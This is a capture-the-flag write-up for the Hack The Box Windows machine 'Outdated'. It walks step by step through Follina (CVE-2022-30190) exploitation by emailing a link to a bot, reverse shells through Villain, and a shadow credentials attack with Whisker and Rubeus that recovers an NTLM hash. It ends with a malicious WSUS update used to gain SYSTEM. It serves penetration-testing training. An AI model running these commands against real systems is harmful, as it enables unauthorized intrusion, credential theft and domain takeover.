Post

HTB • Outdated

Posted Updated
By Bryan McNulty 7 min read

Outdated is a medium Windows machine created by ctrlzero on Hack The Box that features an Active Directory domain controller that is vulnerable to CVE-2022-30190. Successful exploitation of this gets us a shell as a user called btables. This user holds a special privilege over the user sflowers that allows us to conduct a shadow credentials attack and authenticate as them. The user sflowers is part of a group that can create and approve WSUS updates which we can abuse to execute commands and get a privileged shell.

Initial Recon

Let’s first set up our environment and run a TCP port scan with this custom nmap wrapper.

1
2
3
4

# bryan@attacker
rhost="" # replace with machine address
echo rhost=$rhost >> .env && . ./.env
ctfscan $rhost

Some services mentioned in the scan results are 25/SMTP, 53/DNS, 389/LDAP, 445/SMB, and 5985/WinRM. The presence of some of these services indicate that this machine is probably an Active Directory domain controller.

Server Message Block (SMB)

The first port that we’ll enumerate is going to be SMB just because many SMB servers allow anonymous access.

Anonymous Access

1

smbclient -N -L "//$rhost/"

Using anonymous authentication, we are able to get a list of shares including one non-default share named simply Shares. Let’s try to connect to this share and possibly download the contents.

1

smbclient -N "//$rhost/Shares"

It turns out we can actually connect to this share without credentials! There is only one readable file called NOC_Reminder.pdf.

Interesting Document

Let’s download NOC_Reminder.pdf using the smbclient command and see if we can obtain any interesting or valuable information from it.

1
2

smbclient -N "//$rhost/Shares" -c 'prompt;mget *;exit'
chromium ./NOC_Reminder.pdf

Interesting document We find this interested document in an accessible SMB share

We can gather a couple things from this document:

  • We can apparently email itsupport@outdated.htb with links to web applications which may be visited.
  • The target has several unpatched vulnerabilities from the time the document was created.

After doing some research into each CVE mentioned in the document, we find out that one of the vulnerabilities is well documented and has public exploits. This exploit is labeled as CVE-2022-30190, but is more commonly referred to as Follina.

Follina

Follina is a remote code execution vulnerability that can be exploited when a user or application opens a malicious link using the MSDT protocol. Since the document we downloaded earlier suggested that this flaw was not patched, it would be worth our time to investigate.

Exploitation Conditions

In order to successfully exploit this machine, a few conditions must be met.

  1. The URL we submit via email must be visited
  2. The machine must be vulnerable to CVE-2022-30190

Checking Exploitability

We can verify that the url is opened by setting up a web server and sending the URL to itsupport@outdated.htb. To do this, we can use a CLI tool called swaks.

1
2

# bryan@attacker
php -S "$lhost:80"

1
2
3
4
5
6
7
8

# bryan@attacker
for i in {1..3}
    do swaks \
      --server "$rhost" \
      --to "itsupport@outdated.htb" \
      --from "email@mail.com" \
      --body "http://$lhost/"
    done

After we send a few emails and wait a couple minutes, we get a request to our web server from the target.

1
2
3

[Sat Nov  5 04:13:23 2022] 10.10.11.175:49885 Accepted
[Sat Nov  5 04:13:23 2022] 10.10.11.175:49885 [404]: GET / - No such file or directory
[Sat Nov  5 04:13:23 2022] 10.10.11.175:49885 Closing

If you are not receiving any requests after a few minutes, go ahead and reset the machine because this feature can be inconsistent at times.

Exploitation

At this point, we can try to exploit CVE-2022-30190 using a custom exploit script from here along with Villain.

First we start the villain server and generate our payload.

1
2

# bryan@attacker
villain -x 8844

1
2

# bryan@attacker (Villain)
generate os=windows lhost=tun0

Then we run the exploit server script with the generated payload.

1

./msdt_follina_exploit.py -l "$lhost" -p 80 -c "$payload"

After waiting a minute or so, we get multiple requests from the target and a backdoor session for the user btables is established. We add an alias to this session to make things a bit quicker.

1
2

# Villain
alias outdated-btables 59fbcd84-ed554de3-c5698c38

Active Directory Enumeration

To better understand our current context in the domain and find any paths to privilege escalation, we will be using BloodHound alongside SharpHound. These tools together will help enumerate and visualize the domain schema.

BloodHound

First we will copy SharpHound’s PowerShell wrapper from PowerSharpPack onto the machine using the smbserver.py script from Impacket.

1
2

mkdir share
smbserver.py -smb2support x ./share

Then in a different tab, download Invoke-SharpHound4.ps1 to the SMB share directory.

1
2

cd share
wget "https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpHound4.ps1"

First we spawn an interactive shell and connect to our share.

1
2

# Villain
shell outdated-btables

1

net use x: \\10.10.14.3\x

Then we move to C:\Windows\Tasks and download Invoke-SharpHound4.ps1 from our SMB server.

1
2

cd C:\Windows\Tasks
copy X:\Invoke-SharpHound4.ps1 .

Then we load Invoke-SharpHound4.ps1, and execute the Invoke-SharpHound4 function

1

powershell -Ep Bypass ". .\Invoke-SharpHound4.ps1;Invoke-SharpHound4"

After the command has completed, we should have a ZIP archive in our working directory. Let’s copy it to the SMB server’s directory and load it into BloodHound.

1

copy .\*_BloodHound.zip X:\

Once we load the data into bloodhound, we can map a possible attack path with the Reachable High Value Targets query on the btables object.

Bloodhound

Notice how one of the groups our current user is a member of, the ITSTAFF group, has the AddKeyCredentialLink privilege over the sflowers user object. This could set us up for a shadow credentials attack on this user.

Shadow Credentials

To learn more about shadow credentials from a security perspective I would recommend reading this article.

Whisker

A tool called Whisker will help us abuse shadow credentials to compromise the sflowers object. Let’s download this PowerShell wrapper for Whisker onto the target then execute the following commands.

1
2

. .\Invoke-Whisker.ps1
Invoke-Whisker "add /target:sflowers /path:C:\Windows\Tasks\cert.bin /password:3d9563b2cc0c963e"

This should print a command meant for a tool called Rubeus.

Rubeus

Let’s copy the Rubeus powershell wrapper to the target from here then call the function with the arguments specified in the Whisker output.

1
2

. .\Invoke-Rubeus.ps1
Invoke-Rubeus "asktgt /user:sflowers /certificate:C:\Windows\Tasks\cert.bin /password:3d9563b2cc0c963e /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show"

With this command we are able to recover an NTLM hash that should allow us to authenticate as sflowers.

WSUS Abuse

Looking back at our BloodHound window, it appears that sflowers is a member of the Remote Management Users group and the WSUS Administrators group.

SFlowers membership

Having membership in the Remote Management Users group means we can easily establish a shell as sflowers with Evil-WinRM using the hash we obtained with Rubeus. Once we do that the user flag can be found at %USERPROFILE%\Desktop\user.txt

1
2

# Back to the attacking machine
evil-winrm -i "$rhost" -u "sflowers" -H "$hash"

1
2
3
4

# Evil-WinRM
$Desktop = "$env:UserProfile\Desktop"
Get-ChildItem "$Desktop"
Get-Content "$Desktop\user.txt"

I’m assuming our membership to the WSUS Administrators group will let us install WSUS updates on the machine. The PsExec utility along with a tool called SharpWSUS can aid us in exploiting WSUS and gaining administrative privileges. We were actually able to find the suspected PsExec executable already at C:\Users\sflowers\Desktop\PsExec64.exe. We confirm that this is the legitimate executable by comparing its checksum with the checksum of Microsoft’s PsExec64.exe within the PsTools package.

Let’s upload this powershell wrapper for SharpWSUS, generate a Villain payload, and run the Invoke-SharpWSUS function with the appropriate arguments to create a new update.

First let’s create a new Villain payload to execute within our malicious WSUS update.

1
2

# Villain
generate os=windows lhost=tun0 encode

Then we create a new update that will use the PsExec64.exe utility to execute our payload.

1
2

$VillainPayload = "" # Add villain payload here
Invoke-SharpWSUS create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d $VillainPayload"

The output should display an update ID that we can use with the approve option to approve the update for dc.outdated.htb.

1
2

$UpdateId = "" # Add update id here
Invoke-SharpWSUS approve /updateid:"$UpdateId" /computername:"dc.outdated.htb" /groupname:"3v1LGr0Up"

Then after a few minutes we should have a new backdoor session on our Villain server. We then connect to the session using the shell command and read the flag at C:\Users\Administrator\Desktop\root.txt.

Writeups, Hack the Box Machines
Medium Difficulty Intermediate Windows Active Directory SMB Malicious Document Shadow Credentials WSUS WinRM
This post is licensed under CC BY 4.0 by the author.